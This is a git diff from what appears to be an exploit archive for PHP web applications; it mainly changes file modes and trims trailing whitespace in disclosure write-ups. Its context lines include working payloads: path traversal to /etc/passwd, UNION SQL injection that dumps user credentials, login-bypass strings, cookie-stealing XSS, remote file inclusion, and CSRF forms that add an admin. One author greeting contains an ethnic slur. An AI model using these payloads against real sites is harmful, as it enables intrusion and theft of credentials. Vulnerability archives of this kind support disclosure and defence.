http://site.com/index.php?option=com_ckforms&controller=../../../. ./../../../../../../etc/passwd%00 #################################################################### -RxH & ab0-3th4b - - - \ No newline at end of file +RxH & ab0-3th4b \ No newline at end of file diff --git a/platforms/php/webapps/15454.txt b/platforms/php/webapps/15454.txt old mode 100755 new mode 100644 index b769be2ec..032080092 --- a/platforms/php/webapps/15454.txt +++ b/platforms/php/webapps/15454.txt @@ -16,7 +16,4 @@ www.site.com/index.php?action=com_clan&cid=185[Sql Injection] 185+and+1=2+union+select+1,2,3,4,5,6,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),8 -#################################################################### - - - \ No newline at end of file +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/15455.txt b/platforms/php/webapps/15455.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15456.txt b/platforms/php/webapps/15456.txt old mode 100755 new mode 100644 index 28461b87b..650e59d23 --- a/platforms/php/webapps/15456.txt +++ b/platforms/php/webapps/15456.txt @@ -19,4 +19,4 @@ http://localhost/[path]/index.php?option=com_clanlist&clanId=-999 union select v Thanks cyber-warrior.org & AKINCILAR -######################################################################################## \ No newline at end of file +######################################################################################## \ No newline at end of file diff --git a/platforms/php/webapps/15459.txt b/platforms/php/webapps/15459.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15460.txt b/platforms/php/webapps/15460.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15466.txt b/platforms/php/webapps/15466.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15468.txt b/platforms/php/webapps/15468.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15469.txt b/platforms/php/webapps/15469.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1547.txt b/platforms/php/webapps/1547.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15470.txt b/platforms/php/webapps/15470.txt old mode 100755 new mode 100644 index 6797e2237..116d91f4d --- a/platforms/php/webapps/15470.txt +++ b/platforms/php/webapps/15470.txt @@ -8,4 +8,4 @@ Sql Injection : http://localhost/[path]/index.php?option=com_img&controller=../../../../../../../../../../../../../../../etc/passwd%00 ################################################################################################################ Thanks Cyber-Warrior.org & AKINCILAR -################################################################################################################  \ No newline at end of file +################################################################################################################  \ No newline at end of file diff --git a/platforms/php/webapps/15472.txt b/platforms/php/webapps/15472.txt old mode 100755 new mode 100644 index 7144d5e03..741aacf43 --- a/platforms/php/webapps/15472.txt +++ b/platforms/php/webapps/15472.txt @@ -32,4 +32,4 @@ $pos = strpos($self, 'login.php');if($pos == true){echo "<script language='javas Greets, -daandeveloper33 \ No newline at end of file +daandeveloper33 \ No newline at end of file diff --git a/platforms/php/webapps/15484.txt b/platforms/php/webapps/15484.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15486.txt b/platforms/php/webapps/15486.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15488.txt b/platforms/php/webapps/15488.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1549.php b/platforms/php/webapps/1549.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15490.txt b/platforms/php/webapps/15490.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15492.php b/platforms/php/webapps/15492.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15496.txt b/platforms/php/webapps/15496.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15500.txt b/platforms/php/webapps/15500.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15501.txt b/platforms/php/webapps/15501.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15502.txt b/platforms/php/webapps/15502.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15509.txt b/platforms/php/webapps/15509.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15510.txt b/platforms/php/webapps/15510.txt old mode 100755 new mode 100644 index fb04d9c06..fbf9fc522 --- a/platforms/php/webapps/15510.txt +++ b/platforms/php/webapps/15510.txt @@ -12,4 +12,4 @@ http://sourceforge.net/projects/awcm/files/ [+]Exploit: http://target/awcm v2.1 final/awcm/header.php?theme_file=[EV!L] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Greetings:  No Greet  !_! \ No newline at end of file +Greetings:  No Greet  !_! \ No newline at end of file diff --git a/platforms/php/webapps/15513.txt b/platforms/php/webapps/15513.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15515.txt b/platforms/php/webapps/15515.txt old mode 100755 new mode 100644 index 28e5708ca..37d1c806b --- a/platforms/php/webapps/15515.txt +++ b/platforms/php/webapps/15515.txt @@ -9,4 +9,4 @@ The vulnerability is in the file search.php, the variable search_app is vulnerable.An attacker can exploit this to find out the rootpath of website or for Blind SQLi attack. -Google Dork: inurl:index.php?app=core --Example:http://server/index.php?app=core&module=search§ion=search&do=quick_search&search_app[]= \ No newline at end of file +-Example:http://server/index.php?app=core&module=search§ion=search&do=quick_search&search_app[]= \ No newline at end of file diff --git a/platforms/php/webapps/15516.txt b/platforms/php/webapps/15516.txt old mode 100755 new mode 100644 index 027055434..8a628f930 --- a/platforms/php/webapps/15516.txt +++ b/platforms/php/webapps/15516.txt @@ -37,4 +37,4 @@ SGreatz : X-Father , Mo7a , My Keybord :D ./D0n3 -[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#] \ No newline at end of file +[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#] \ No newline at end of file diff --git a/platforms/php/webapps/15517.txt b/platforms/php/webapps/15517.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15518.txt b/platforms/php/webapps/15518.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15519.txt b/platforms/php/webapps/15519.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15524.txt b/platforms/php/webapps/15524.txt old mode 100755 new mode 100644 index dc327f7ec..0dddf2da2 --- a/platforms/php/webapps/15524.txt +++ b/platforms/php/webapps/15524.txt @@ -13,7 +13,4 @@ In The Name Of GOD go to /signinform.php Username : admin - Password : 1'or'1'='1 - - - \ No newline at end of file + Password : 1'or'1'='1 \ No newline at end of file diff --git a/platforms/php/webapps/15526.txt b/platforms/php/webapps/15526.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15531.txt b/platforms/php/webapps/15531.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15543.txt b/platforms/php/webapps/15543.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15545.txt b/platforms/php/webapps/15545.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15549.txt b/platforms/php/webapps/15549.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15550.txt b/platforms/php/webapps/15550.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15555.txt b/platforms/php/webapps/15555.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15557.txt b/platforms/php/webapps/15557.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15559.txt b/platforms/php/webapps/15559.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15560.txt b/platforms/php/webapps/15560.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15561.txt b/platforms/php/webapps/15561.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15564.txt b/platforms/php/webapps/15564.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15565.txt b/platforms/php/webapps/15565.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15567.txt b/platforms/php/webapps/15567.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15568.py b/platforms/php/webapps/15568.py index 54ec276c1..b5e8252a2 100755 --- a/platforms/php/webapps/15568.py +++ b/platforms/php/webapps/15568.py @@ -244,6 +244,4 @@ if sys.argv[3] == '-s': if len(sys.argv) < 4: printHelp() getSchemas(sessid, sys.argv[1], sys.argv[2], valId) - exit(0) - - \ No newline at end of file + exit(0) \ No newline at end of file diff --git a/platforms/php/webapps/15570.php b/platforms/php/webapps/15570.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15571.txt b/platforms/php/webapps/15571.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15572.txt b/platforms/php/webapps/15572.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15573.html b/platforms/php/webapps/15573.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15574.txt b/platforms/php/webapps/15574.txt old mode 100755 new mode 100644 index bfe7c597b..7bf988421 --- a/platforms/php/webapps/15574.txt +++ b/platforms/php/webapps/15574.txt @@ -45,5 +45,4 @@ http://127.0.0.1/clip/index.php?v= {EV!L EXPLO!T} # [~]{[(D!R 4ll 0R D!E)]}; # # -[~]--------------------------------------------------------------------------------------------- - \ No newline at end of file +[~]--------------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/php/webapps/15577.html b/platforms/php/webapps/15577.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15578.txt b/platforms/php/webapps/15578.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15585.txt b/platforms/php/webapps/15585.txt old mode 100755 new mode 100644 index 00f7f010a..244d19a63 --- a/platforms/php/webapps/15585.txt +++ b/platforms/php/webapps/15585.txt @@ -19,8 +19,4 @@ http://127.0.0.1/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../. _______________________________________________________________________ Thanks to : All RosebanditZ Team & All IndonesiaCoder -_______________________________________________________________________ - - - - \ No newline at end of file +_______________________________________________________________________ \ No newline at end of file diff --git a/platforms/php/webapps/15588.txt b/platforms/php/webapps/15588.txt old mode 100755 new mode 100644 index 7c67ba494..ab2da6d30 --- a/platforms/php/webapps/15588.txt +++ b/platforms/php/webapps/15588.txt @@ -13,4 +13,4 @@ http://server/s-cms/viewforum.php?id='1 (FPD) http://server/s-cms/viewforum.php?id=1+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7+from+cms_users-- (SQLi) -http://server/s-cms/viewforum.php?id='1%3E%22%3Cscript%3Ealert(document.cookie)%3C/script%3E (XSS) \ No newline at end of file +http://server/s-cms/viewforum.php?id='1%3E%22%3Cscript%3Ealert(document.cookie)%3C/script%3E (XSS) \ No newline at end of file diff --git a/platforms/php/webapps/15590.txt b/platforms/php/webapps/15590.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15592.txt b/platforms/php/webapps/15592.txt old mode 100755 new mode 100644 index a108180f6..d28c39b44 --- a/platforms/php/webapps/15592.txt +++ b/platforms/php/webapps/15592.txt @@ -59,4 +59,4 @@ http://www.server/index.php?mp_id='><script>alert(document.cookie)</script> [ GReet ] -[+] : Exploit-db.com , all hackers muslims \ No newline at end of file +[+] : Exploit-db.com , all hackers muslims \ No newline at end of file diff --git a/platforms/php/webapps/15593.html b/platforms/php/webapps/15593.html old mode 100755 new mode 100644 index d0aa0f5d3..6412874ac --- a/platforms/php/webapps/15593.html +++ b/platforms/php/webapps/15593.html @@ -21,5 +21,4 @@ action="http://www.site.com:2082/frontend/x3/contact/saveemail.html"> -------------------------------------------------------------------------------------- -Gr33ts : RENO - Mr.M3x - all Member p0c Team .. - \ No newline at end of file +Gr33ts : RENO - Mr.M3x - all Member p0c Team .. \ No newline at end of file diff --git a/platforms/php/webapps/15594.txt b/platforms/php/webapps/15594.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15595.txt b/platforms/php/webapps/15595.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15602.txt b/platforms/php/webapps/15602.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15605.txt b/platforms/php/webapps/15605.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15606.txt b/platforms/php/webapps/15606.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15607.txt b/platforms/php/webapps/15607.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15608.txt b/platforms/php/webapps/15608.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15610.txt b/platforms/php/webapps/15610.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15612.txt b/platforms/php/webapps/15612.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15614.html b/platforms/php/webapps/15614.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15615.html b/platforms/php/webapps/15615.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15621.txt b/platforms/php/webapps/15621.txt old mode 100755 new mode 100644 index d121d31f4..643ad14ea --- a/platforms/php/webapps/15621.txt +++ b/platforms/php/webapps/15621.txt @@ -24,8 +24,4 @@ di anak tirikan karena ga tersebut nicknya) [#]------------------------------------------------------------------- note : jangan mengatakan setiap apa yang engkau ketahui tapi ketahuilah setiap -apa yang kau katakan! - - - - \ No newline at end of file +apa yang kau katakan! \ No newline at end of file diff --git a/platforms/php/webapps/15623.pl b/platforms/php/webapps/15623.pl index 609cff9e3..cf952e105 100755 --- a/platforms/php/webapps/15623.pl +++ b/platforms/php/webapps/15623.pl @@ -110,4 +110,4 @@ sub http_header return $http->default_header($_[0]); } -# Greetz to Sri Lankans \ No newline at end of file +# Greetz to Sri Lankans \ No newline at end of file diff --git a/platforms/php/webapps/1563.pm b/platforms/php/webapps/1563.pm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15633.html b/platforms/php/webapps/15633.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15636.txt b/platforms/php/webapps/15636.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15637.txt b/platforms/php/webapps/15637.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15638.txt b/platforms/php/webapps/15638.txt old mode 100755 new mode 100644 index 153d18151..f2cf969e8 --- a/platforms/php/webapps/15638.txt +++ b/platforms/php/webapps/15638.txt @@ -36,6 +36,4 @@ Duhok Forum Remot upload Vulnerability greetz : kader11000 lagripe-dz mca_crb NetCat-Dz all dz members -www.h4kz.net www.v4-team.com www.vbspiders.com www.dz4all.com/cc - - \ No newline at end of file +www.h4kz.net www.v4-team.com www.vbspiders.com www.dz4all.com/cc \ No newline at end of file diff --git a/platforms/php/webapps/15639.txt b/platforms/php/webapps/15639.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15640.txt b/platforms/php/webapps/15640.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15641.txt b/platforms/php/webapps/15641.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15642.txt b/platforms/php/webapps/15642.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15643.txt b/platforms/php/webapps/15643.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15644.txt b/platforms/php/webapps/15644.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15645.txt b/platforms/php/webapps/15645.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15646.txt b/platforms/php/webapps/15646.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15647.txt b/platforms/php/webapps/15647.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15650.txt b/platforms/php/webapps/15650.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15651.txt b/platforms/php/webapps/15651.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15654.txt b/platforms/php/webapps/15654.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15656.txt b/platforms/php/webapps/15656.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15659.txt b/platforms/php/webapps/15659.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1566.php b/platforms/php/webapps/1566.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15660.txt b/platforms/php/webapps/15660.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1567.php b/platforms/php/webapps/1567.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15684.txt b/platforms/php/webapps/15684.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15685.html b/platforms/php/webapps/15685.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15691.txt b/platforms/php/webapps/15691.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15699.txt b/platforms/php/webapps/15699.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15701.txt b/platforms/php/webapps/15701.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15714.txt b/platforms/php/webapps/15714.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15715.txt b/platforms/php/webapps/15715.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15718.txt b/platforms/php/webapps/15718.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15719.txt b/platforms/php/webapps/15719.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15720.txt b/platforms/php/webapps/15720.txt old mode 100755 new mode 100644 index f5522e1cb..49e7111b4 --- a/platforms/php/webapps/15720.txt +++ b/platforms/php/webapps/15720.txt @@ -40,8 +40,4 @@ Spesial thanks : [ indonesianhacker.or.id | tecon-crew.org | devilzc0de.org | makassarhacker.com ] note : jangan mengatakan setiap apa yang engkau ketahui tapi ketahuilah setiap -apa yang kau katakan! - - - - \ No newline at end of file +apa yang kau katakan! \ No newline at end of file diff --git a/platforms/php/webapps/15721.txt b/platforms/php/webapps/15721.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15735.txt b/platforms/php/webapps/15735.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15736.txt b/platforms/php/webapps/15736.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15740.txt b/platforms/php/webapps/15740.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15741.txt b/platforms/php/webapps/15741.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15742.txt b/platforms/php/webapps/15742.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15743.txt b/platforms/php/webapps/15743.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15748.txt b/platforms/php/webapps/15748.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15749.txt b/platforms/php/webapps/15749.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15752.txt b/platforms/php/webapps/15752.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15754.txt b/platforms/php/webapps/15754.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15755.txt b/platforms/php/webapps/15755.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15756.txt b/platforms/php/webapps/15756.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1576.txt b/platforms/php/webapps/1576.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15765.txt b/platforms/php/webapps/15765.txt old mode 100755 new mode 100644 index ebc070eb9..235f339f0 --- a/platforms/php/webapps/15765.txt +++ b/platforms/php/webapps/15765.txt @@ -44,4 +44,4 @@ Greetz : All IRANIAN Hackerz ~ Cyber Hackerz Persian Gulf For Ever ~ Not Damn Mother F***er Arabians!! -########################################################################### \ No newline at end of file +########################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/15766.txt b/platforms/php/webapps/15766.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15768.txt b/platforms/php/webapps/15768.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15769.txt b/platforms/php/webapps/15769.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15770.txt b/platforms/php/webapps/15770.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15771.txt b/platforms/php/webapps/15771.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15772.txt b/platforms/php/webapps/15772.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15773.txt b/platforms/php/webapps/15773.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15775.txt b/platforms/php/webapps/15775.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15779.txt b/platforms/php/webapps/15779.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15781.txt b/platforms/php/webapps/15781.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15783.txt b/platforms/php/webapps/15783.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15789.txt b/platforms/php/webapps/15789.txt old mode 100755 new mode 100644 index 508ab98df..ad55837e2 --- a/platforms/php/webapps/15789.txt +++ b/platforms/php/webapps/15789.txt @@ -32,4 +32,4 @@ User panel: http://server/plxadtrader/ Admin Panel: http://server/plxadtrader/admin/ -################################################################################################### \ No newline at end of file +################################################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/15790.txt b/platforms/php/webapps/15790.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15791.txt b/platforms/php/webapps/15791.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15793.txt b/platforms/php/webapps/15793.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15795.txt b/platforms/php/webapps/15795.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15797.txt b/platforms/php/webapps/15797.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15798.txt b/platforms/php/webapps/15798.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15799.txt b/platforms/php/webapps/15799.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15800.txt b/platforms/php/webapps/15800.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15801.txt b/platforms/php/webapps/15801.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15804.txt b/platforms/php/webapps/15804.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15808.txt b/platforms/php/webapps/15808.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15811.txt b/platforms/php/webapps/15811.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15812.txt b/platforms/php/webapps/15812.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15813.txt b/platforms/php/webapps/15813.txt old mode 100755 new mode 100644 index 36749bf1b..4237af24a --- a/platforms/php/webapps/15813.txt +++ b/platforms/php/webapps/15813.txt @@ -63,7 +63,4 @@ exit(); Password: 'or'a'='a -#################################################################### - - - \ No newline at end of file +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/15814.txt b/platforms/php/webapps/15814.txt old mode 100755 new mode 100644 index a38359127..5e129ed49 --- a/platforms/php/webapps/15814.txt +++ b/platforms/php/webapps/15814.txt @@ -13,9 +13,4 @@ Joomla Component com_ponygallery Multiple Remote File Include www.site.com/components/com_ponygallery/admin.ponygallery.html.php?mosConfig_absolute_path=[shell.txt?] www.site.com/components/com_ponygallery/admin.ponygallery.php?mosConfig_absolute_path=[shell.txt?] -#################################################################### - - - - - \ No newline at end of file +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/15815.txt b/platforms/php/webapps/15815.txt old mode 100755 new mode 100644 index e13360cbb..4d1defede --- a/platforms/php/webapps/15815.txt +++ b/platforms/php/webapps/15815.txt @@ -12,9 +12,4 @@ Joomla Component com_adsmanager Remote File Include www.site.com/index.php?option=com_adsmanager&mosConfig_absolute_path=[shell.txt?] -#################################################################### - - - - - \ No newline at end of file +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/15816.txt b/platforms/php/webapps/15816.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15818.txt b/platforms/php/webapps/15818.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15819.txt b/platforms/php/webapps/15819.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15820.txt b/platforms/php/webapps/15820.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15822.html b/platforms/php/webapps/15822.html old mode 100755 new mode 100644 index fe22ac053..08b50da54 --- a/platforms/php/webapps/15822.html +++ b/platforms/php/webapps/15822.html @@ -23,5 +23,4 @@ </form> <script>document.p0c.submit();</script> -NICKNAME: P0C T34M - \ No newline at end of file +NICKNAME: P0C T34M \ No newline at end of file diff --git a/platforms/php/webapps/15824.txt b/platforms/php/webapps/15824.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15825.txt b/platforms/php/webapps/15825.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15826.txt b/platforms/php/webapps/15826.txt old mode 100755 new mode 100644 index 8d774f22e..512481dda --- a/platforms/php/webapps/15826.txt +++ b/platforms/php/webapps/15826.txt @@ -22,4 +22,4 @@ </form> <script>document.p0c.submit();</script> </html> -TRAIDNT UP Version 3.0 - CSRF Add Admin \ No newline at end of file +TRAIDNT UP Version 3.0 - CSRF Add Admin \ No newline at end of file diff --git a/platforms/php/webapps/15827.txt b/platforms/php/webapps/15827.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15828.txt b/platforms/php/webapps/15828.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15830.txt b/platforms/php/webapps/15830.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15831.txt b/platforms/php/webapps/15831.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15832.txt b/platforms/php/webapps/15832.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15835.html b/platforms/php/webapps/15835.html old mode 100755 new mode 100644 index e45824142..57a8ae066 --- a/platforms/php/webapps/15835.html +++ b/platforms/php/webapps/15835.html @@ -33,4 +33,4 @@ <script>document.tnt.submit();</script> </html> -NickName : P0C T34M \ No newline at end of file +NickName : P0C T34M \ No newline at end of file diff --git a/platforms/php/webapps/15836.txt b/platforms/php/webapps/15836.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15837.txt b/platforms/php/webapps/15837.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15838.php b/platforms/php/webapps/15838.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15840.txt b/platforms/php/webapps/15840.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15843.txt b/platforms/php/webapps/15843.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15846.txt b/platforms/php/webapps/15846.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15847.txt b/platforms/php/webapps/15847.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15848.txt b/platforms/php/webapps/15848.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15849.txt b/platforms/php/webapps/15849.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1585.php b/platforms/php/webapps/1585.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15850.html b/platforms/php/webapps/15850.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15852.txt b/platforms/php/webapps/15852.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15853.txt b/platforms/php/webapps/15853.txt old mode 100755 new mode 100644 index b7cdf8e79..a23c2a3f2 --- a/platforms/php/webapps/15853.txt +++ b/platforms/php/webapps/15853.txt @@ -27,4 +27,4 @@ Warning: mysql_num_rows(): /home/user/public_html/news.php on line 227 # Site : http://vbspiders.com # Group : KaLa$nikoV t34m # Date : {26-12-2010}# Software : DGNews v 2.1# Greetz : just me :L -# team : VoLc4n0 --=-- stone love --=-- fla$h \ No newline at end of file +# team : VoLc4n0 --=-- stone love --=-- fla$h \ No newline at end of file diff --git a/platforms/php/webapps/15856.php b/platforms/php/webapps/15856.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15857.txt b/platforms/php/webapps/15857.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15858.txt b/platforms/php/webapps/15858.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1586.php b/platforms/php/webapps/1586.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15863.txt b/platforms/php/webapps/15863.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15864.txt b/platforms/php/webapps/15864.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15865.php b/platforms/php/webapps/15865.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1588.php b/platforms/php/webapps/1588.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15886.txt b/platforms/php/webapps/15886.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15887.txt b/platforms/php/webapps/15887.txt old mode 100755 new mode 100644 index f90a081ff..a7e406362 --- a/platforms/php/webapps/15887.txt +++ b/platforms/php/webapps/15887.txt @@ -82,5 +82,4 @@ ############################################### - [ dun / 2011 ] - \ No newline at end of file + [ dun / 2011 ] \ No newline at end of file diff --git a/platforms/php/webapps/15889.txt b/platforms/php/webapps/15889.txt old mode 100755 new mode 100644 index fa5471867..91fcaae5c --- a/platforms/php/webapps/15889.txt +++ b/platforms/php/webapps/15889.txt @@ -60,5 +60,4 @@ ############################################### - [ dun / 2011-01-01 ] - \ No newline at end of file + [ dun / 2011-01-01 ] \ No newline at end of file diff --git a/platforms/php/webapps/15890.txt b/platforms/php/webapps/15890.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/15891.txt b/platforms/php/webapps/15891.txt old mode 100755 new mode 100644 index 1dfd48502..8eea8038f --- a/platforms/php/webapps/15891.txt +++ b/platforms/php/webapps/15891.txt @@ -18,9 +18,4 @@ www.site.com/gallery.php?id=null+and+1=2+union+select+1,group_concat(userid,0x3a www.site.com/gadmin/index.php -#################################################################### - - - - - \ No newline at end of file +#################################################################### \ No newline at 